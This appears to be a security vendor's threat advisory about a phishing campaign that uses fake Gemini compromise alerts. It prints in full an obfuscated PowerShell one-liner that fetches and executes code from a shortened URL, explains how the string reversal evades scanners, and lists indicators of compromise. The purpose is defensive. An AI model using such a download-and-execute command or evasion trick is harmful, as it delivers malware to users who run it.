Our Security Operations Center (SOC) recently identified a new phishing campaign targeting users with fake Gemini security alerts. The attack tricks recipients into executing a malicious PowerShell command, which likely installs malware or harvests credentials. This was detected through our Abusebox service, powered by Cofense, which analyzes user-reported phishing emails and suspicious attachments.
Phishing Email Details
Subject: Your Gemini May Be Compromised – [Target’s Last Name] Secure It Immediately
Sender: Terencio Munchausen cvogkuhpeggiviiln@outlook[.]com
Attachment: [Target’s Last Name].pdf
Malicious URL: https://shortl[.]at/LYSYr (Disabled, destination unknown)
File Hash: 83988f6bd34a421e2e68467a66f387b26e816cb504af415c5ccd21694103b922
Attack Flow
1) User receives a phishing email claiming an unauthorized login attempt on their Gemini AI account.
2) The email urges immediate action, instructing the user to run a PowerShell command to “secure their system.”
3) The command executes a hidden PowerShell script, which downloads content from a shortened URL:
powershell -w hidden -c "$g=('rSYLT/ta.lrutrohs//:sptth'[24..0] -join ''); iwr $g|iex"
What This Command Does
(Step-by-Step Breakdown)
1) ('rSYLT/ta.lrutrohs//:sptth'[24..0] -join '')
a) This reverses a hidden URL (https://shortl[.]at/LYSYr), obfuscating it from security scanners.
2) $g = ('rSYLT/ta.lrutrohs//:sptth'[24..0] -join '')
a) Stores the deobfuscated URL into variable $g.
3) iwr $g | iex
a) iwr (Invoke-WebRequest) fetches the script from the shortened URL.
b) iex (Invoke-Expression) executes whatever is downloaded.
Why This Is Dangerous
1) User-Triggered Malware Execution – The attack bypasses traditional security because the user manually runs the malicious command.
2) Obfuscation via String Reversal – Security tools scanning for specific URLs might miss this due to the reversed string.
3) Shortened Link Masking – Attackers use a URL shortener to hide the final payload, making detection and investigation difficult.
Indicators of Compromise (IOCs)
|
INDICATOR |
DESCRIPTION |
|
Email Sender |
Terencio Munchausen <cvogkuhpeggiviiln@outlook[.]com> |
|
File Hash |
83988f6bd34a421e2e68467a66f387b26e816cb504af415c5ccd21694103b922 |
|
Shortened URL |
https://shortl[.]at/LYSYr (Now inactive) |
|
PowerShell Command |
powershell -w hidden -c “$g=(‘rSYLT/ta.lrutrohs//:sptth’[24..0] -join ‘’); iwr $g |
|
Fake Login Attempt Details |
IP: 67.85.14.114 (Hamhung, North Korea) |
Recommended Actions
FOR SECURITY TEAMS
1) Block the malicious PowerShell pattern at EDR/XDR level.
2) Hunt for execution of this PowerShell command (iwr | iex) on endpoints.
3) Blacklist the sender’s domain and inspect logs for similar messages.
4) Monitor network traffic for any outbound connections to shortened links.
FOR END USERS
1) Never execute PowerShell commands from unsolicited emails.
2) Verify security alerts directly in the official Gemini/Google Security Dashboard.
3) Report suspicious emails to your SOC or IT security team immediately.
Final Thoughts
Threat actors continue to weaponize AI-related services to trick users into self-compromising actions. This campaign highlights the importance of phishing awareness and strict PowerShell execution policies in enterprise environments.
Cyderes’ Abusebox service will continue tracking and mitigating these evolving tactics. If you suspect similar threats in your environment, reach out for incident response support.
Ready to put these insights into practice and improve your ongoing security posture?
For more cybersecurity tips, follow Cyderes on LinkedIn and X.
